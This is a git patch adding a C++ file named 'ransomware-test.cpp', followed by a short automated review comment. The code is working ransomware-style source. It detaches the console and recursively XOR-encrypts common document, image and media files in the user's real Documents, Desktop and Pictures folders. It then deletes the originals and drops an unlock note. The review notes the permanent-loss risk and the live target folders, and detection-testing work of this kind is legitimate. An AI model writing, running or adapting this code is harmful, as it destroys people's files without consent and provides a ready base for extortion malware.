From e7cae7921944b901e56c442b26a64648e22d9e36 Mon Sep 17 00:00:00 2001
From: Daniel Tam
Date: Tue, 14 Aug 2018 03:06:55 -0500
Subject: [PATCH] Initial commit
---
ransomware-test.cpp | 162 ++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 162 insertions(+)
create mode 100644 ransomware-test.cpp
diff --git a/ransomware-test.cpp b/ransomware-test.cpp
new file mode 100644
index 0000000..dfb6d3b
--- /dev/null
+++ b/ransomware-test.cpp
@@ -0,0 +1,162 @@
+/*
+Info: Cycle through computer encrypting files depending on extension type to mimic ransomware
+ Currently uses XOR encryption
+Compiler: MinGW g++ 8.1.0 (Windows 10)
+Flags: -std=c++14 -static-libgcc -static-libstdc++ -lws2_32 -lboost_system -lboost_filesystem
+Run ex: ransomware-test.exe
+
+TODO:
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+// set the encryption key
+std::string key = "1234567890abcdefghij";
+bool decrypt = false;
+
+// file encryption
+void encryptFile(std::string inFileName)
+{
+ std::string newName;
+ // determine the new name of the file
+ if(decrypt)
+ {
+ std::size_t found = inFileName.find_last_of(".");
+ std::string extension = inFileName.substr(found+1);
+
+ if(extension == "dart")
+ {
+ newName = inFileName.substr(0, found);
+ }
+ }
+ else
+ {
+ newName = inFileName + ".dart";
+ }
+
+ std::size_t found = inFileName.find_last_of("\\");
+ std::string fileName = inFileName.substr(found+1);
+
+ if(fileName != "README TO UNLOCK.txt") // skip if the file is the readme
+ {
+ // XOR encryption
+ std::ifstream inFile;
+ std::ofstream outFile;
+
+ inFile.open(inFileName, std::ios::in | std::ios::binary);
+ std::string str((std::istreambuf_iterator(inFile)), std::istreambuf_iterator()); // Reads a text file into a single string.
+ inFile.close();
+
+ for (unsigned x = 0; x < str.size(); x++)
+ str[x] ^= key[x % key.size()];
+
+ outFile.open(newName, std::ios::out | std::ios::binary);
+ outFile.write(str.c_str(), str.size());
+ outFile.close();
+
+ if(!decrypt) // only delete if we're not decrypting
+ boost::filesystem::remove(inFileName);
+ }
+}
+
+// check listed extensions against known
+bool checkFileExtension(const std::string &fileName)
+{
+ std::size_t found = fileName.find_last_of(".");
+ std::string extension = fileName.substr(found+1);
+ std::vector knownExtensions = {"txt", "html", "doc", "docx", "docm", "dotx", "dotm", "xls", "xlsx", "xlsm", "xltm", "pptx", "pptm", "ppt", "pdf", "jpeg", "jpg", "png", "gif", "mp3", "wma",
+ "avi", "mkv", "xml", "log", "htm", "css", "js", "php", "ico", "dart"}; // .dart in here for decrypting
+
+ for(auto const& ext : knownExtensions)
+ {
+ if(boost::iequals(ext, extension))
+ {
+ return true;
+ }
+ }
+
+ return false;
+}
+
+// drop help file with decryption key in the directory of encrypted files
+void dropHelpFile(const std::string &path)
+{
+ std::size_t found = path.find_last_of("\\");
+ std::string filePath = path.substr(0, found) + "\\README TO UNLOCK.txt";
+
+ if(!boost::filesystem::exists(filePath))
+ {
+ std::ofstream helpFile;
+ helpFile.open(filePath);
+ helpFile << "Unlock code: 1234567890abcdefghij";
+ helpFile.close();
+ }
+}
+
+// recursively find all the files in a directory
+void getAllFilesInDir(const std::string &dirPath)
+{
+ try
+ {
+ if(boost::filesystem::exists(dirPath) && boost::filesystem::is_directory(dirPath))
+ {
+ boost::filesystem::recursive_directory_iterator iter(dirPath);
+
+ boost::filesystem::recursive_directory_iterator end;
+
+ while(iter != end)
+ {
+ if(checkFileExtension(iter->path().string()))
+ {
+ // start encrypting the file if the extension matches
+ encryptFile(iter->path().string());
+ dropHelpFile(iter->path().string());
+ }
+ boost::system::error_code ec;
+ iter.increment(ec);
+ }
+ }
+ }
+ catch (std::system_error & e)
+ {
+
+ }
+}
+
+
+int main(int argc, const char *argv[])
+{
+ // check for decryption mode
+ if (argc > 1)
+ {
+ decrypt = true;
+ std::cout << "mode=decrypt" << std::endl;
+ }
+ else
+ {
+ FreeConsole();
+ }
+ // get the username to start the search
+ std::string username = getenv("USERNAME");
+ std::string userDir = "C:\\Users\\" + username + "\\";
+
+ // User documents directory
+ std::string startDir = userDir + "Documents";
+ getAllFilesInDir(startDir);
+
+ // User desktop directory
+ startDir = userDir + "Desktop";
+ getAllFilesInDir(startDir);
+
+ // User pictures directory
+ startDir = userDir + "Pictures";
+ getAllFilesInDir(startDir);
+}
\ No newline at end of file
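Review bot: `encryptFile` deletes the original with `boost::filesystem::remove(inFileName)` without checking that `inFile` opened or that the write to `outFile` succeeded, so on a test host a failed open or write turns a reversible simulation into permanent data loss. Gate the delete on both stream states, for example `if(!decrypt && !inFile.fail() && !outFile.fail())`. The exposure is larger than it needs to be because `main` always walks the current user's live `Documents`, `Desktop` and `Pictures` folders, with no confirmation and with the console detached by `FreeConsole()`; a simulator meant for exercising detections would be safer if it only operated on an explicitly supplied, dedicated test directory. Separately, `std::string username = getenv("USERNAME");` is undefined behaviour when the variable is unset, so the pointer should be checked before the string is constructed.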